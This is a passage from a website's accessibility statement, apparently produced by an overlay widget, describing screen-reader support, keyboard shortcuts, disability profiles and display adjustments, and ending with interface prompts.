    accurate form labels; descriptions for actionable icons (social media icons,
    search icons, cart icons, etc.); validation guidance for form inputs;
    element roles such as buttons, menus, modal dialogues (popups), and others. 
    
    Additionally, the background process scans all of the website’s images. It
    provides an accurate and meaningful image-object-recognition-based
    description as an ALT (alternate text) tag for images that are not
    described. It will also extract texts embedded within the image using an OCR
    (optical character recognition) technology. To turn on screen-reader
    adjustments at any time, users need only to press the Alt+1 keyboard
    combination. Screen-reader users also get automatic announcements to turn
    the Screen-reader mode on as soon as they enter the website.
    
    These adjustments are compatible with popular screen readers such as JAWS,
    NVDA, VoiceOver, and TalkBack.
    
    
 2. Keyboard navigation optimization: The background process also adjusts the
    website’s HTML and adds various behaviors using JavaScript code to make the
    website operable by the keyboard. This includes the ability to navigate the
    website using the Tab and Shift+Tab keys, operate dropdowns with the arrow
    keys, close them with Esc, trigger buttons and links using the Enter key,
    navigate between radio and checkbox elements using the arrow keys, and fill
    them in with the Spacebar or Enter key.
    
    Additionally, keyboard users will find content-skip menus available at any
    time by clicking Alt+2, or as the first element of the site while navigating
    with the keyboard. The background process also handles triggered popups by
    moving the keyboard focus towards them as soon as they appear, not allowing
    the focus to drift outside.
    
    Users can also use shortcuts such as “M” (menus), “H” (headings), “F”
    (forms), “B” (buttons), and “G” (graphics) to jump to specific elements.

Disability profiles supported on our website
 * Epilepsy Safe Profile: this profile enables people with epilepsy to safely
   use the website by eliminating the risk of seizures resulting from flashing
   or blinking animations and risky color combinations.
 * Vision Impaired Profile: this profile adjusts the website so that it is
   accessible to the majority of visual impairments such as Degrading Eyesight,
   Tunnel Vision, Cataract, Glaucoma, and others.
 * Cognitive Disability Profile: this profile provides various assistive
   features to help users with cognitive disabilities such as Autism, Dyslexia,
   CVA, and others, to focus on the essential elements more easily.
 * ADHD Friendly Profile: this profile significantly reduces distractions and
   noise to help people with ADHD, and Neurodevelopmental disorders browse,
   read, and focus on the essential elements more easily.
 * Blind Users Profile (Screen-readers): this profile adjusts the website to be
   compatible with screen-readers such as JAWS, NVDA, VoiceOver, and TalkBack. A
   screen-reader is installed on the blind user’s computer, and this site is
   compatible with it.
 * Keyboard Navigation Profile (Motor-Impaired): this profile enables
   motor-impaired persons to operate the website using the keyboard Tab,
   Shift+Tab, and the Enter keys. Users can also use shortcuts such as “M”
   (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics) to
   jump to specific elements.

Additional UI, design, and readability adjustments
 1. Font adjustments – users can increase and decrease its size, change its
    family (type), adjust the spacing, alignment, line height, and more.
 2. Color adjustments – users can select various color contrast profiles such as
    light, dark, inverted, and monochrome. Additionally, users can swap color
    schemes of titles, texts, and backgrounds with over seven different coloring
    options.
 3. Animations – epileptic users can stop all running animations with the click
    of a button. Animations controlled by the interface include videos, GIFs,
    and CSS flashing transitions.
 4. Content highlighting – users can choose to emphasize essential elements such
    as links and titles. They can also choose to highlight focused or hovered
    elements only.
 5. Audio muting – users with hearing devices may experience headaches or other
    issues due to automatic audio playing. This option lets users mute the
    entire website instantly.
 6. Cognitive disorders – we utilize a search engine linked to Wikipedia and
    Wiktionary, allowing people with cognitive disorders to decipher meanings of
    phrases, initials, slang, and others.
 7. Additional functions – we allow users to change cursor color and size, use a
    printing mode, enable a virtual keyboard, and many other functions.

Assistive technology and browser compatibility

We aim to support as many browsers and assistive technologies as possible, so
our users can choose the best fitting tools for them, with as few limitations as
possible. Therefore, we have worked very hard to be able to support all major
systems that comprise over 95% of the user market share, including Google
Chrome, Mozilla Firefox, Apple Safari, Opera and Microsoft Edge, JAWS, and NVDA
(screen readers), both for Windows and MAC users.

Notes, comments, and feedback

Despite our very best efforts to allow anybody to adjust the website to their
needs, there may still be pages or sections that are not fully accessible, are
in the process of becoming accessible, or are lacking an adequate technological
solution to make them accessible. Still, we are continually improving our
accessibility, adding, updating, improving its options and features, and
developing and adopting new technologies. All this is meant to reach the optimal
level of accessibility following technological advancements. If you wish to
contact the website’s owner, please use the website's form

Hide Accessibility Interface? Please note: If you choose to hide the
accessibility interface, you won't be able to see it anymore, unless you clear
your browsing history and data. Are you sure that you wish to hide the
interface?
Accept Cancel

Continue



Processing the data, please give it a few seconds...
Press Alt+1 for screen-reader mode


Sumo